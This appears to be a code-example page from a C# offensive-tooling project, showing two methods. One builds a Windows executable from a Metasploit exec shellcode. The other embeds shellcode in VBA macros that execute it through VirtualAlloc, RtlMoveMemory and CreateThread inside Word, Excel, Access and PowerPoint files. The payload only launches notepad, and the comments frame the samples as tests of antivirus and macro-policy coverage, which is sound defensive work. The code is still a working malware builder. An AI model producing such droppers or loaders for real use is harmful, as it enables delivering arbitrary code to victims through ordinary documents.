コード例 #1
ファイル: NativeCode.cs プロジェクト: CreatePhotonW/MyWarez
        // Assembly Example with shellcode using Yasm + GoLink
        // Builds the "AssemblyShellcodeYasmGoLink" sample: a Metasploit exec payload (CMD=notepad) is
        // embedded as-is in a YASM source, assembled with the Yasm plugin and linked with the GoDevTool
        // linker into an executable whose entry point is the payload's own label.
        // Returns the Attack after Generate() has been called on it.
        private static IAttack AssemblyShellcodeYasmGoLinkExample()
        {
            var sampleSink = new SamplesOutput();
            IOutput[] outputs = { sampleSink };
            var attack = new Attack(outputs, name: "AssemblyShellcodeYasmGoLink");

            // Raw payload bytes come from the Metasploit payload factory; the command is a notepad launch.
            var payloadBytes = MetasploitPayloadFactory.Generate(
                format: "raw",
                payload: "windows/x64/exec",
                options: "EXITFUNC=thread CMD=notepad");

            // The bytes are wrapped in the class matching their architecture (x64 here), then placed
            // unmodified into a YASM assembly source.
            var asmSource = new RawShellcodeYasmAssemblySource(
                new ShellcodeX64(payloadBytes),
                symbolName: "SheSellsShellCodesByTheSilkRoad", // label at the start of the payload; callable like a function from C
                // This payload does not modify itself, but the section is made writable anyway.
                // NOTE(review): presumably this yields a section that is both writable and executable;
                // such sections are rare in ordinary compiler output and are a common static-triage signal.
                sectionWritable: true);

            // Assemble the source into a Win64 object file.
            var yasm       = (IAssembler <YASM, Win64ObjectFile>) new MyWarez.Plugins.Yasm.Yasm();
            var objectFile = yasm.Assemble(asmSource);

            // The linker's ENTRY option is set to the payload label, so the image starts directly in the payload.
            var payloadFunction = (ICFunction)asmSource;
            var goLinkOptions   = new MyWarez.Plugins.GoDevTool.Linker.Config(ENTRY: payloadFunction.Name);
            var goLink          = (ILinker <Win64ObjectFile, Executable>) new MyWarez.Plugins.GoDevTool.Linker(goLinkOptions);
            var notepadExe      = goLink.Link(objectFile);

            // Running the sample should spawn notepad, which confirms the payload executed.
            sampleSink.Add("AssemblyShellcodeYasmGoLinkNotepad.exe", notepadExe);

            // Note: linking with MSVC instead of GoLink would also be an option.

            attack.Generate();
            return attack;
        }
コード例 #2
        // Office VBAMacro Example
        // Builds the "OfficeVbaMacro" sample set: one shellcode-running VBA macro is wrapped into a
        // Word, an Excel, an Access and a PowerPoint document, and each document is added to the
        // samples output under "<App>VbaMacro.<Extension>".
        // Returns the Attack after Generate() has been called on it.
        private static IAttack OfficeVbaMacroExample()
        {
            var sampleSink = new SamplesOutput();
            IOutput[] outputs = { sampleSink };
            var attack = new Attack(outputs, name: "OfficeVbaMacro");

            var payloadBytes = MetasploitPayloadFactory.Generate(
                format: "raw",
                payload: "windows/exec",
                options: "EXITFUNC=thread CMD=notepad");

            // A 32-bit payload is used because, per the author, most Microsoft Office installs are 32-bit.
            // The macro runs it through VirtualAlloc + RtlMoveMemory + CreateThread.
            // NOTE(review): that API trio declared from a macro is a widely signatured pattern, which makes
            // these samples useful for checking macro-execution policy and AV/EDR coverage.
            var macro = new ShellcodeVbaMacro(new ShellcodeX86(payloadBytes));

            // Word
            var wordDocument = new WordVBAMacro(macro);
            var wordFilename = $"WordVbaMacro.{wordDocument.Extension}";
            sampleSink.Add(wordFilename, wordDocument);

            // Excel
            var excelDocument = new ExcelVBAMacro(macro);
            var excelFilename = $"ExcelVbaMacro.{excelDocument.Extension}";
            sampleSink.Add(excelFilename, excelDocument);

            // Access
            var accessDocument = new AccessVBAMacro(macro);
            var accessFilename = $"AccessVbaMacro.{accessDocument.Extension}";
            sampleSink.Add(accessFilename, accessDocument);

            // PowerPoint
            var powerPointDocument = new PowerPointVBAMacro(macro);
            var powerPointFilename = $"PowerPointVbaMacro.{powerPointDocument.Extension}";
            sampleSink.Add(powerPointFilename, powerPointDocument);

            attack.Generate();
            return attack;
        }